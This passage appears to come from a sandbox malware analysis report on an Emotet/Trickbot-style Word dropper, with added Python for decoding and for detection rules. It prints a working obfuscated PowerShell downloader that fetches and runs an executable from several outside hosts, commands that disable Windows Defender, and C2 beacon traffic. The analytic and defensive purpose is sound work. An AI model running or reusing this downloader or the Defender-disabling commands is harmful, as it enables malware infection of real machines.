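    return "".join(parts)


def analyse(ps):
    """Summarise a concatenation-obfuscated downloader: URLs tried, where the payload
    lands, the smallest response accepted, and whether it is executed."""
    clean = collapse_concat(ps)
    size = re.search(r"\.length\s+-ge\s+(\d+)", clean)
    return {
        "urls": URL.findall(clean),
        "drop_path": resolve_drop_path(clean),
        "min_size": int(size.group(1)) if size else None,
        "executes": "Invoke-Item" in clean,
    }


if __name__ == "__main__":
    print(decode_encoded_arg(ENCODED_PREFIX))        # $W3_5463_=('h86_
    print(collapse_concat(VBA_TAIL, q='"'))
    for key, value in analyse(STAGE1).items():
        print(f"{key}: {value}")
```

The size check is the part worth remembering when you reproduce this in a lab: a server that answers with an error page shorter than 40000 bytes is skipped silently and the next URL is tried, so a single dead host does not stop the chain. The VBA fragment folds to the last 35 characters of the -e blob; on its own it is not a multiple of four, so it cannot be decoded in isolation, only as part of the full argument.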
-
Installation/Persistence
-
Dropped files
- details
-
"ZPhQTlnvSsgt3fI129V.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"~_c_message_859897272.doc" has type "data"
"46.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"ZOhPSkmvRrgs3fH129U.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"Enc_message_859897272.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Mon Feb 25 19:33:16 2019 mtime=Mon Feb 25 19:33:16 2019 atime=Mon Feb 25 19:33:24 2019 length=192029 window=hide"
"78F892B4.w6687_" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 baseline precision 8 1409x624 frames 3"
"index.dat" has type "data"
"settings.ini" has type "FORTRAN program ASCII text with very long lines with CRLF line terminators"
"~WRS_E7EB73ED-EE40-4DBE-81AA-CD3F1390723D_.tmp" has type "data"
"613245a6258220a31eae4344732fc929_6b06490d-f9fd-424c-8b6d-83edc4369e89" has type "data"
"6QIW9QO31PIEZF62WBMQ.temp" has type "data"
"~WRS_4C6B9B43-EDD9-4FF0-BF0F-7997885F684E_.tmp" has type "data"
"~_Normal.dotm" has type "data" - source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000019.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4C6B9B43-EDD9-4FF0-BF0F-7997885F684E}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B5938D7A-39BC-45CB-A464-8EFD9287CCB1}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B5938D7A-39BC-45CB-A464-8EFD9287CCB1}.tmp"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3AA76EA6-9F01-4A9F-A9FB-A70FFC59C7E5}.tmp" - source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ib"
Pattern match: "http://schemas.microsoft.com/aml/2001/core"
Heuristic match: "ipinfo.io"
Heuristic match: "GET /ip HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: ipinfo.io"
Heuristic match: "api.ipify.org"
Heuristic match: "GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Host: api.ipify.org"
Heuristic match: "162.12.124.64.cbl.abuseat.org"
Heuristic match: "162.12.124.64.zen.spamhaus.org" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Hooks API calls
- details
-
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "e9abc02b00cc" to virtual address "0xFEA24060" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e933f02b00" to virtual address "0xFEA21180" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "02329c1641cdd401" to virtual address "0xE4FA25D8" (part of module "MSCORWKS.DLL")
"WINWORD.EXE" wrote bytes "06b2511341cdd401" to virtual address "0xEBB4D610" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "e913b0e9ff" to virtual address "0xFEE450C0" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "72c0831341cdd401" to virtual address "0x3FFD3258" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "b5213c1341cdd401" to virtual address "0xF3250160" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "f5ae371341cdd401" to virtual address "0xE5ADDE48" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "dba2411341cdd401" to virtual address "0xF34CFA00" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "3e87411341cdd401" to virtual address "0xECDF2350" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "e933ef2b00cccc" to virtual address "0xFEA21210" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e94b9f2b00cccccccccc" to virtual address "0xFEA26230" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48b8bc5273eafe070000ffe0" to virtual address "0x76BE9020" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "d0fe7c1341cdd401" to virtual address "0xEEDF71C0" (part of module "WWLIB.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52877AA" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52878AD" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE5287A60" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE5287A25" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "654c8b1c2588150000" to virtual address "0xE52874FB" (part of module "MSCORWKS.DLL")
"powershell.exe" wrote bytes "65488b042588150000" to virtual address "0xE528863C" (part of module "MSCORWKS.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179 (Show technique in the MITRE ATT&CK™ matrix)
File Details
Enc_message_859897272.doc
- Filename
- Enc_message_859897272.doc
- Size
- 188KiB (192029 bytes)
- Type
- doc office
- Description
- XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 977da43966cf6a1a04c30e077083b1f76da9f224596923c869b6aafdf102f022
- MD5
- 161082ffc5f09ec0da7812dc73fb68b2
- SHA1
- 28a90b754dae78e27db1ffc997688f473cf77ac8
- ssdeep
- 3072:9mdGNRMht7Q2Q9xKxaSqlzLhpDU4e08RGiWCKiG1mM0OrfFwMT2c:9vNR0cQaSGJUvAbC3M0SfR
Hybrid Analysis
Analysed 23 processes in total.
- WINWORD.EXE /n "C:\Enc_message_859897272.doc" (PID: 2132)
- powershell.exe poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnA ... (PID: 3304, Additional Context: $W3_5463_=('h86_'+'0242');$G6__1179=new-object Net.WebClient;$c_0_5___=('http://'+'35.1'+'84'+'.61.'+'2'+'54'+'/tg'+'9p'+'zdY@'+'htt'+'p:'+'//52'+'.'+'20'+'4.186.102/PASm'+'kvmb'+'@http://54.'+'17'+'2.8'+'5'+'.'+'22'+'1/T'+'i0'+'JeJu'+'9'+'@ht'+'tp://52.'+'70'+'.'+'23'+'9.229/b'+'log/wp-'+'c'+'onte'+'nt/uplo'+'ads/'+'PZ96X'+'ibEUU@http'+'://2'+'22.106'+'.2'+'1'+'7.3'+'7/'+'wo'+'r'+'dpres'+'s/3I'+'1e5'+'Jx').Split('@');$E__1867=('c_'+'__47');$m4__5_20 = '46';$h15574=('q4'+'440_');$J06_684_=$env:userprofile+'\'+$m4__5_20+('.e'+'xe');foreach($U_86169 in $c_0_5___){try{$G6__1179.DownloadFile($U_86169, $J06_684_);$l85___=('h'+'__'+'_03');If ((Get-Item $J06_684_).length -ge 40000) {Invoke-Item $J06_684_;$I3742_8=('L93'+'_'+'1__5');break;}}catch{}}$w_33_34=('Q20'+'0101');)
- limewcs.exe (PID: 3664) AV 16/70
- limewcs.exe (PID: 1916) AV 16/70
- ZOhPSkmvRrgs3fH129U.exe (PID: 3880) AV 11/69
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 1712)
- cmd.exe /c sc stop WinDefend (PID: 3224)
- sc.exe sc stop WinDefend (PID: 3280)
- cmd.exe /c sc delete WinDefend (PID: 1708)
- sc.exe sc delete WinDefend (PID: 3124)
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3428)
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 2160)
- ZPhQTlnvSsgt3fI129V.exe (PID: 1992) AV 11/69
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3676)
- cmd.exe /c sc stop WinDefend (PID: 1152)
- sc.exe sc stop WinDefend (PID: 1592)
- cmd.exe /c sc delete WinDefend (PID: 3908)
- sc.exe sc delete WinDefend (PID: 4056)
- cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3004)
- powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true (PID: 3640)
- svchost.exe (PID: 3320)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
162.12.124.64.cbl.abuseat.org | 127.0.0.2 (TTL: 2099) | Gandi SAS; Organization: CBL, a division of Spamhaus; Name Server: NS3.SPAMHAUS.ORG; Creation Date: Sat, 23 Feb 2002 00:50:34 GMT | Reserved |
162.12.124.64.zen.spamhaus.org | - | Gandi SAS; Organization: The Spamhaus Project; Name Server: NS20.JA.NET; Creation Date: Fri, 01 Oct 1999 11:03:57 GMT | - |
api.ipify.org | 107.22.215.20 (TTL: 2010) | eNom, Inc.; Name Server: NS1.DNSIMPLE.COM; Creation Date: Sun, 05 Jan 2014 22:02:15 GMT | United States |
ipinfo.io | 216.239.32.21 (TTL: 268) | http://www.nic.ac/go/whois/ipinfo.ac | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
35.184.61.254 | 80 TCP | powershell.exe PID: 3304 | United States |
52.204.186.102 | 80 TCP | powershell.exe PID: 3304 | United States |
74.59.106.11 | 8080 TCP | limewcs.exe PID: 1916 | Canada |
216.239.32.21 | 80 TCP | svchost.exe PID: 3320 | United States |
103.122.84.170 | 449 TCP | svchost.exe PID: 3320 | India |
107.22.215.20 | 80 TCP | svchost.exe PID: 3732 | United States |
45.250.66.10 | 449 TCP | svchost.exe PID: 3732 | India |
31.131.18.108 | 447 TCP | svchost.exe PID: 3732 | Ukraine |
195.123.245.16 | 443 TCP | svchost.exe PID: 3732 | Ukraine |
212.80.216.238 | 447 TCP | svchost.exe PID: 3732 | Spain |
190.146.112.216 | 8082 TCP | svchost.exe PID: 2368 | Colombia |
HTTP Traffic
Endpoint | Request | URL | Raw request (header lines separated by " / ") |
---|---|---|---|
35.184.61.254:80 | GET | 35.184.61.254/tg9pzdY | GET /tg9pzdY HTTP/1.1 / Host: 35.184.61.254 / Connection: Keep-Alive |
35.184.61.254:80 | GET | 35.184.61.254/tg9pzdY/ | GET /tg9pzdY/ HTTP/1.1 / Host: 35.184.61.254 |
52.204.186.102:80 | GET | 52.204.186.102/PASmkvmb | GET /PASmkvmb HTTP/1.1 / Host: 52.204.186.102 / Connection: Keep-Alive |
52.204.186.102:80 | GET | 52.204.186.102/PASmkvmb/ | GET /PASmkvmb/ HTTP/1.1 / Host: 52.204.186.102 |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1 / Cookie: 10250=LrpInODSRsb+vp6tz83xjyNq6D1OvY5xXJgDH23xClkQ0X06uVlfQDrXpmRYu8xBxXCbESFXZmi2W3ELyajE3s9bq6S3Ey9O09Jhtqbic9qacqnAFtHuq4y/6zVdQUllD9Mt7uor/aYRIxA2o1yw9mUATQwWL4Rw94eOWJKYCH9pBq6E8DwyTWEysP4MQ8CWbsObOzBJIv0qN65WLt2oOSjrZLNfbMH0vwLj/JhlXFDcxMj2SvaI/B4Av4Ib6jzyZZaIf/D7C1fE/ov9YpxhmMAzrNrub0Egt3VNAUgARrVM5aB1EKpczNRbWuTjtb25h+1UVHak61JXHFLHHq79zT71k75mSXn+rpGFK2eWbYnmMNgKsBh57eGYw4Fg7c5T1xl4G/7dkObf6rUxHyD9sTGPX/QnklDdgmalXieptNGTzXe0vsxhijAo7JYMwutaJw8DpA== / User-Agent: Mozilla/4.0 (c... |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1 / Cookie: 10250=<same value as the previous request> / User-Agent: Mozilla/4.0 (c... |
74.59.106.11:8080 | GET | 74.59.106.11/ | GET / HTTP/1.1 / Cookie: 30610=NO7QSVXRVOw6x6j2XUvbkbLD3gRIkbFaQIeqg7iOWIBg4+4QzmyfwnPE2iZVm8YqwejBCADs7XEOHz+nuln8N1wwk5XrUv2D/uj5AfYQRErXLoiUv1LBCNFUE27n410i6wBHEFjqVMDoq38CUuN4OzRAdNQQBELNoCdGZri+/+byTW/Rpo9o2PakP1O2zFDm38RBdjlNsdSnMBEAcbBtQ3x8lPNZKr47m6zNBB6qdsk3XK3d+0gBx0hGqIe+LpXwHk5FuLo4LErubwClBjQ85YAl7rhTZiSwJOmAsXcjTf13SD6OLEAt5Ror4ULSLjDTzp/pD3IvGvcGducmX12WOPoLyuF7BZLgfDioux1PZ6iI7gTcb0dCcX2r0KxOz8CNCChCNuVIH4FUGHuxIoQWHDrpxbUes9IRHqhXPnE+dUXISSFfpwn5qsnpgiYgCtmmXcRgUA== / User-Agent: Mozilla/4.0 (c... |
216.239.32.21:80 (ipinfo.io) | GET | ipinfo.io/ip | GET /ip HTTP/1.1 / Connection: Keep-Alive / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 / Host: ipinfo.io |
107.22.215.20:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1 / Connection: Keep-Alive / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 / Host: api.ipify.org |
190.146.112.216:8082 | POST | 190.146.112.216/del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 | POST /del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 HTTP/1.1 / Content-Type: multipart/form-data; boundary=Arasfjasu7 / User-Agent: test / Host: 190.146.112.216:8082 / Content-Length: 154 / Cache-Control: no-cache |
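Four request shapes in this table are worth turning into detections: the short-path GETs to bare IP addresses with no User-Agent that fetched stage 2; the GET / requests to 74.59.106.11:8080 whose only payload is a roughly 450-character base64 Cookie (the User-Agent is truncated in the report); the external IP lookups against ipinfo.io and api.ipify.org, which are what the two ET POLICY Suricata alerts below fire on; and the multipart POST with User-Agent "test" whose path carries the guest's hostname, a Windows version marker (W617601 reads as 6.1 build 7601, i.e. Windows 7 SP1) and a 32-hex-digit identifier. The two DNS queries in the DNS Requests table fit the same fingerprinting flow: 162.12.124.64.cbl.abuseat.org and 162.12.124.64.zen.spamhaus.org are reversed-octet blocklist lookups for 64.124.12.162, presumably the sandbox's egress address, and the 127.0.0.2 answer from the CBL zone is the DNSBL convention for "listed". The Python below is an added example, not code from the report: it parses each request (copied from the table; the beacon's truncated User-Agent is kept as printed and its Host line is taken from the Endpoint column) and classifies it. Rule names, the 256-character cookie threshold and the bare-IP heuristic are mine.

```python
"""Classify the raw HTTP requests from the report's traffic table into detection findings.

Added example, not code from the report. Rule names, thresholds and the 'bare IP with no
User-Agent' heuristic are mine.
"""
import base64
import binascii
import re

CRLF = "\r\n"
# Cookie of the first beacon to 74.59.106.11:8080, copied from the table.
COOKIE = (
    "10250=LrpInODSRsb+vp6tz83xjyNq6D1OvY5xXJgDH23xClkQ0X06uVlfQDrXpmRYu8xBxXCbESFXZmi2W3ELyajE3s9"
    "bq6S3Ey9O09Jhtqbic9qacqnAFtHuq4y/6zVdQUllD9Mt7uor/aYRIxA2o1yw9mUATQwWL4Rw94eOWJKYCH9pBq6E8Dwy"
    "TWEysP4MQ8CWbsObOzBJIv0qN65WLt2oOSjrZLNfbMH0vwLj/JhlXFDcxMj2SvaI/B4Av4Ib6jzyZZaIf/D7C1fE/ov9Yp"
    "xhmMAzrNrub0Egt3VNAUgARrVM5aB1EKpczNRbWuTjtb25h+1UVHak61JXHFLHHq79zT71k75mSXn+rpGFK2eWbYnmMN"
    "gKsBh57eGYw4Fg7c5T1xl4G/7dkObf6rUxHyD9sTGPX/QnklDdgmalXieptNGTzXe0vsxhijAo7JYMwutaJw8DpA=="
)
UA_CHROME = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/71.0.3578.98 Safari/537.36")

# Requests as the table shows them. The beacon's User-Agent is truncated in the report and
# kept that way; its Host line is taken from the Endpoint column.
REQUESTS = {
    "stage2_fetch": CRLF.join(["GET /tg9pzdY HTTP/1.1", "Host: 35.184.61.254", "Connection: Keep-Alive", "", ""]),
    "cookie_beacon": CRLF.join(["GET / HTTP/1.1", "Cookie: " + COOKIE, "User-Agent: Mozilla/4.0 (c",
                                "Host: 74.59.106.11:8080", "", ""]),
    "ip_lookup": CRLF.join(["GET /ip HTTP/1.1", "Connection: Keep-Alive", "User-Agent: " + UA_CHROME,
                            "Host: ipinfo.io", "", ""]),
    "host_id_upload": CRLF.join([
        "POST /del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 HTTP/1.1",
        "Content-Type: multipart/form-data; boundary=Arasfjasu7", "User-Agent: test",
        "Host: 190.146.112.216:8082", "Content-Length: 154", "Cache-Control: no-cache", "", ""]),
}

IP_LOOKUP_HOSTS = {"api.ipify.org", "ipinfo.io"}          # the hosts behind the ET POLICY alerts
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
# /<group>/<hostname>_W<os digits>.<32 hex>/<n>: the shape of the POST path in the table
HOST_ID_PATH = re.compile(
    r"^/(?P<group>[^/]+)/(?P<hostname>[A-Za-z0-9-]+)_W(?P<os>\d+)\.(?P<id>[0-9A-F]{32})/(?P<n>\d+)$")


def parse_request(raw):
    """Split a raw request into (method, path, {lower-cased header name: value})."""
    head = raw.partition(CRLF + CRLF)[0]
    lines = head.split(CRLF)
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_base64_blob(value, min_len=256):
    """True for a long, strictly valid base64 string (the beacon's whole payload is one)."""
    if len(value) < min_len or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def cookie_blob(raw):
    """Decoded bytes of a single name=<base64> cookie, or b'' when there is none."""
    _, _, headers = parse_request(raw)
    value = headers.get("cookie", "").partition("=")[2]
    return base64.b64decode(value) if is_base64_blob(value) else b""


def parse_host_id(path):
    """Fields of a host-identifier upload path, or None when the path has another shape."""
    m = HOST_ID_PATH.match(path)
    return m.groupdict() if m else None


def classify(raw):
    """Findings for one request, in rule order."""
    method, path, h = parse_request(raw)
    host = h.get("host", "")
    findings = []
    if host.split(":")[0] in IP_LOOKUP_HOSTS:
        findings.append("external_ip_lookup")
    if is_base64_blob(h.get("cookie", "").partition("=")[2]):
        findings.append("base64_cookie_beacon")
    if (method == "POST" and h.get("user-agent") == "test"
            and "multipart/form-data" in h.get("content-type", "") and parse_host_id(path)):
        findings.append("host_id_multipart_upload")
    if method == "GET" and BARE_IP.match(host) and "user-agent" not in h and len(path) <= 16:
        findings.append("bare_ip_no_ua_fetch")
    return findings


if __name__ == "__main__":
    for name, raw in REQUESTS.items():
        print(f"{name}: {classify(raw)}")
    print("beacon payload bytes:", len(cookie_blob(REQUESTS["cookie_beacon"])))
```

The base64 cookie rule deliberately requires strict decoding and a length floor rather than matching on the cookie name, because the name changes between beacons (10250 and 30610 in the table) while the shape of the value does not; the host-identifier rule keys on the path structure plus the literal User-Agent "test", and the parsed fields (hostname, OS marker, 32-hex id) are what you would pivot on in proxy logs to find other machines reporting to the same server.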
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 107.22.215.20:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org | 2021997 |
local -> 216.239.32.21:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Possible External IP Lookup ipinfo.io | 2020716 |
31.131.18.108 -> local:49182 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
52.204.186.102 -> local:49162 (TCP) | - | - | - |
195.123.245.16 -> local:49185 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
212.80.216.238 -> local:49186 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
195.123.245.16 -> local:49187 (TCP) | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 2021013 |
Extracted Files
-
Malicious 3
-
-
ZOhPSkmvRrgs3fH129U.exe
- Size
- 187KiB (190976 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Malware.Heuristic" (11/69)
- Runtime Process
- limewcs.exe (PID: 1916)
- MD5
- 6cfda02865edccaf334560e7ad9a1c36
- SHA1
- 8129b93024ad35231d40d6f25e88e7ed55444873
- SHA256
- 24b671b72df6949d896c497376444f23a714926bbffdb2221de85fbbb2078baf
-
46.exe
- Size
- 236KiB (241664 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "BehavesLike.Emotet" (16/70)
- Runtime Process
- 46.exe (PID: 2412)
- MD5
- 5f5c909eb5e68ffb1f3475a1c8d6c933
- SHA1
- 92c54833bc36fdf9dd3b60241acec9072ba2b737
- SHA256
- 499a87bc17a49136c784d3e10cd2b90b999eb4feea2cf50f06c93f0eff2db52f
-
ZPhQTlnvSsgt3fI129V.exe
- Size
- 187KiB (190976 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "Malware.Heuristic" (11/69)
- MD5
- 6cfda02865edccaf334560e7ad9a1c36
- SHA1
- 8129b93024ad35231d40d6f25e88e7ed55444873
- SHA256
- 24b671b72df6949d896c497376444f23a714926bbffdb2221de85fbbb2078baf
-
-
Clean 1
-
-
~_c_message_859897272.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/57
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
-
Informative 9
-
-
613245a6258220a31eae4344732fc929_6b06490d-f9fd-424c-8b6d-83edc4369e89
- Size
- 1KiB (1067 bytes)
- Type
- data
- Runtime Process
- ZOhPSkmvRrgs3fH129U.exe (PID: 3880)
- MD5
- 361ac0735bd95a4dd1792b1eca13e545
- SHA1
- e8468368db6279822d405fba3b25d68d383aa2fa
- SHA256
- e04e6b0071fd35fa523ca618513e599a538c54a2e4321e58d1ae98fd133d1100
-
Enc_message_859897272.LNK
- Size
- 518B (518 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Feb 25 19:33:16 2019, mtime=Mon Feb 25 19:33:16 2019, atime=Mon Feb 25 19:33:24 2019, length=192029, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 535110b0b62d0674acfa696b45853420
- SHA1
- d1b622c0a9d8ab1c0335c0d3432b2e0529f9f811
- SHA256
- 770f0dcedbb648b1962c69ef1f872164132493e42230cfd437aaf17902491949
-
index.dat
- Size
- 138B (138 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 8e3f6c24da3d8e70b069613ac6d54ddd
- SHA1
- 207d98a8888bb3773305953f13eac2c067b6ff19
- SHA256
- ddff46672830d7409efc5d3a17f4248b0da32b949251a86d828ec18916344004
-
6QIW9QO31PIEZF62WBMQ.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3304)
- MD5
- d0ce95c9dd0c18f24d42644fab1c420a
- SHA1
- 41dea125c519d59ead1497f3eda570f2cbb1a1b7
- SHA256
- db333058224c3bcddb2e744ce924e4b862a285999006be957bf3374c97b0b19f
-
settings.ini
- Size
- 70KiB (71433 bytes)
- Type
- text
- Description
- FORTRAN program, ASCII text, with very long lines, with CRLF line terminators
- Runtime Process
- svchost.exe (PID: 3320)
- MD5
- b8843ba7336e2524d5edd6cb49e309f4
- SHA1
- 8abdabe665f5d0694e6c033a59a935b5af2134a5
- SHA256
- d8e5318dff7a9cb56b8c8ef270289fd4ec71b9298aa54d383f8da92505f52a16
-
78F892B4.w6687_
- Size
- 65KiB (66553 bytes)
- Type
- img image
- Description
- JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1409x624, frames 3
- Runtime Process
- WINWORD.EXE (PID: 2132)
- MD5
- 638118b841157824fb5fa270c717bd18
- SHA1
- 18eb4270ce86080f25280e5141842404784673c6
- SHA256
- 76db61fb3f22d579ba9d542eacd3fa6fedbc6db71294da924a063a2bb5bbefe0
-
~WRS_E7EB73ED-EE40-4DBE-81AA-CD3F1390723D_.tmp
- Size
- 1.6KiB (1606 bytes)
- Type
- data
- MD5
- 9fba1d67656864bef14e1adb41424565
- SHA1
- 1c741295a8f753f83161d6d9ca6c7060a5f5b2a9
- SHA256
- 2b8df0de8851e7293ec9fb0c619c36f8bc618ee595956c99ab09bfe392cbe257
-
~WRS_4C6B9B43-EDD9-4FF0-BF0F-7997885F684E_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 16cf07b6d6f758652122f5c01b561b38
- SHA1
- 5ef543ce193044191392e2b8e887a300c52baf74
- SHA256
- 3882a3e04d6cf66707b31c8cb14a7c9fe512d10dd355f97a37e8666270f6e17d
-
Notifications
-
Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-0" are available in the report
